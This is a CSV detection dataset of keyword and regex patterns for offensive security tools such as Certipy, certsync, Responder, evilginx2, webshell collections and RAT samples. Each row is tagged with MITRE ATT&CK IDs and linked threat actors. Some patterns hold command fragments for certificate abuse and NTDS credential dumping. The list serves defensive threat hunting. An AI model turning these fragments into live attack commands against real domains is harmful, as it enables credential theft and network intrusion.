"*cef1fb3c6273b3a908f79a5a5d74dbfe4ceabd2d9f850b2bd3e08e1908c440f1*",".{0,1000}cef1fb3c6273b3a908f79a5a5d74dbfe4ceabd2d9f850b2bd3e08e1908c440f1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37990"
"*cef7cc0c146c7fc4a4beb9accd058cfe2d1bc80039993d1798e2f63d7216168a*",".{0,1000}cef7cc0c146c7fc4a4beb9accd058cfe2d1bc80039993d1798e2f63d7216168a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37991"
"*cefcadb734f22d7ddd0ce551628c246f4484400758ccb64afeb37bb93c78b5e0*",".{0,1000}cefcadb734f22d7ddd0ce551628c246f4484400758ccb64afeb37bb93c78b5e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37992"
"*cefe3493adac8a6a93651d2299547c1e0891897522f2f1c4e0835ce577e60632*",".{0,1000}cefe3493adac8a6a93651d2299547c1e0891897522f2f1c4e0835ce577e60632.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37993"
"*ceffb6a2cd944a1309ee3b88992ea04e456f17bc2234b861bf1ed43e51a3e973*",".{0,1000}ceffb6a2cd944a1309ee3b88992ea04e456f17bc2234b861bf1ed43e51a3e973.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37994"
"*celerystalk*",".{0,1000}celerystalk.{0,1000}","offensive_tool_keyword","celerystalk","celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.","T1046 - T1057 - T1082 - T1087 - T1069","TA0001 - TA0007","N/A","N/A","Reconnaissance","https://github.com/sethsec/celerystalk","1","0","N/A","N/A","N/A","5","401","70","2021-03-24T01:23:11Z","2018-08-13T04:21:37Z","37995"
"*Celesty Binder/Celesty.exe*",".{0,1000}Celesty\sBinder\/Celesty\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37996"
"*cerberus-rat.com*",".{0,1000}cerberus\-rat\.com.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37997"
"*cerbrutus.py*",".{0,1000}cerbrutus\.py.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1110 - T1040 - T1496","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","N/A","4","385","57","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z","37998"
"*Cerbrutus-BruteForcer*",".{0,1000}Cerbrutus\-BruteForcer.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1110 - T1040 - T1496","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","N/A","4","385","57","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z","37999"
"*cert*responder.crt*",".{0,1000}cert.{0,1000}responder\.crt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","38000"
"*cert*responder.key*",".{0,1000}cert.{0,1000}responder\.key.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","38001"
"*certi.py_vulntemplates_output*",".{0,1000}certi\.py_vulntemplates_output.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38002"
"*certi_py_enum*",".{0,1000}certi_py_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38003"
"*Certify.exe *",".{0,1000}Certify\.exe\s.{0,1000}","offensive_tool_keyword","Certify","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","38004"
"*Certify.exe *",".{0,1000}Certify\.exe\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","38005"
"*Certify.exe*",".{0,1000}Certify\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","38006"
"*certipy account *",".{0,1000}certipy\saccount\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38007"
"*certipy auth *",".{0,1000}certipy\sauth\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38008"
"*certipy ca *",".{0,1000}certipy\sca\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38009"
"*certipy ca -backup*",".{0,1000}certipy\sca\s\-backup.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38010"
"*certipy cert *",".{0,1000}certipy\scert\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38011"
"*certipy find *",".{0,1000}certipy\sfind\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38012"
"*certipy find *",".{0,1000}certipy\sfind\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38013"
"*certipy forge *",".{0,1000}certipy\sforge\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38014"
"*certipy forge *",".{0,1000}certipy\sforge\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38015"
"*Certipy not found. Please install Certipy before running ADCSync*",".{0,1000}Certipy\snot\sfound\.\sPlease\sinstall\sCertipy\sbefore\srunning\sADCSync.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","38016"
"*certipy relay *",".{0,1000}certipy\srelay\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38017"
"*certipy relay -ca *",".{0,1000}certipy\srelay\s\-ca\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38018"
"*certipy req *",".{0,1000}certipy\sreq\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38019"
"*certipy req -u * -p * -target-ip * -dc-ip * -ca *",".{0,1000}certipy\sreq\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-target\-ip\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-ca\s.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","38020"
"*certipy req -username *",".{0,1000}certipy\sreq\s\-username\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38021"
"*certipy shadow *",".{0,1000}certipy\sshadow\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38022"
"*certipy template *",".{0,1000}certipy\stemplate\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38023"
"*certipy_enum*",".{0,1000}certipy_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38024"
"*certipy-master.zip*",".{0,1000}certipy\-master\.zip.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","1","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38025"
"*CertStealer.csproj*",".{0,1000}CertStealer\.csproj.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1552.001 - T1140 - T1005 - T1649","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","10","5","487","68","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z","38028"
"*CertStealer.exe*",".{0,1000}CertStealer\.exe.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1552.001 - T1140 - T1005 - T1649","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","10","5","487","68","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z","38029"
"*CertStealer.sln*",".{0,1000}CertStealer\.sln.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1552.001 - T1140 - T1005 - T1649","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","10","5","487","68","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z","38030"
"*certsync *--dc-ip*",".{0,1000}certsync\s.{0,1000}\-\-dc\-ip.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","38031"
"*certsync -u *",".{0,1000}certsync\s\-u\s.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","38032"
"*certsync -u * -p *-d * -ca-ip *",".{0,1000}certsync\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-d\s.{0,1000}\s\-ca\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38033"
"*certsync_ntds_dump*",".{0,1000}certsync_ntds_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38034"
"*certsync-master.zip*",".{0,1000}certsync\-master\.zip.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","38035"
"*cewl --depth * --with-numbers -*",".{0,1000}cewl\s\-\-depth\s.{0,1000}\s\-\-with\-numbers\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38043"
"*cf0ef69e85418ec61f9200a26553738987c546710243bfae6c86b25edfdb5651*",".{0,1000}cf0ef69e85418ec61f9200a26553738987c546710243bfae6c86b25edfdb5651.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","38044"
"*cf112c0d0d54cb34784dca2a61ee9e119e5e7804e38f55aa435fd885ba8f6d5b*",".{0,1000}cf112c0d0d54cb34784dca2a61ee9e119e5e7804e38f55aa435fd885ba8f6d5b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","38045"
"*cf1d4595c7a03ce084a85f1545ba3593dd396eb88049c6d5c87efaa594e41c7f*",".{0,1000}cf1d4595c7a03ce084a85f1545ba3593dd396eb88049c6d5c87efaa594e41c7f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","38048"
"*cf25b9f3-849e-447f-a029-2fef5969eca3*",".{0,1000}cf25b9f3\-849e\-447f\-a029\-2fef5969eca3.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#GUIDproject","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","38050"
"*cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12*",".{0,1000}cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","38051"
"*cf27aacb093a56d56b3e6a0f5d6d1992fb1b69465e14fcb1ef13c9a57989dbad*",".{0,1000}cf27aacb093a56d56b3e6a0f5d6d1992fb1b69465e14fcb1ef13c9a57989dbad.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","38052"
"*cf2e73e6453dad578e2fbc308e7dfc4d44fc2eb93e612d466705723fe858f5d6*",".{0,1000}cf2e73e6453dad578e2fbc308e7dfc4d44fc2eb93e612d466705723fe858f5d6.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","38054"
"*cf2f9d4e499c45cf102ede7ccb8e0e4e44005f9cf0313024771dda337bd6e1dd*",".{0,1000}cf2f9d4e499c45cf102ede7ccb8e0e4e44005f9cf0313024771dda337bd6e1dd.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","38055"
"*cf34d737bc503bc71f9dec42dd3c016dd9fc90120f2811e2fa36cc3b69660a33*",".{0,1000}cf34d737bc503bc71f9dec42dd3c016dd9fc90120f2811e2fa36cc3b69660a33.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","38056"
"*cf3753524bf8c852c2e81c008688ecfb91e75ba207ade5ef048c33bde631baef*",".{0,1000}cf3753524bf8c852c2e81c008688ecfb91e75ba207ade5ef048c33bde631baef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","38057"
"*cf3d0e1a42c7631616c6efb3134aa8fb0822ce9e27ed2f2427d14634f12e1209*",".{0,1000}cf3d0e1a42c7631616c6efb3134aa8fb0822ce9e27ed2f2427d14634f12e1209.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","38058"
"*cf40d8f944e06150ba37c216c6c5899bb4618374eee80347e11e3f3e21b9968b*",".{0,1000}cf40d8f944e06150ba37c216c6c5899bb4618374eee80347e11e3f3e21b9968b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","38060"
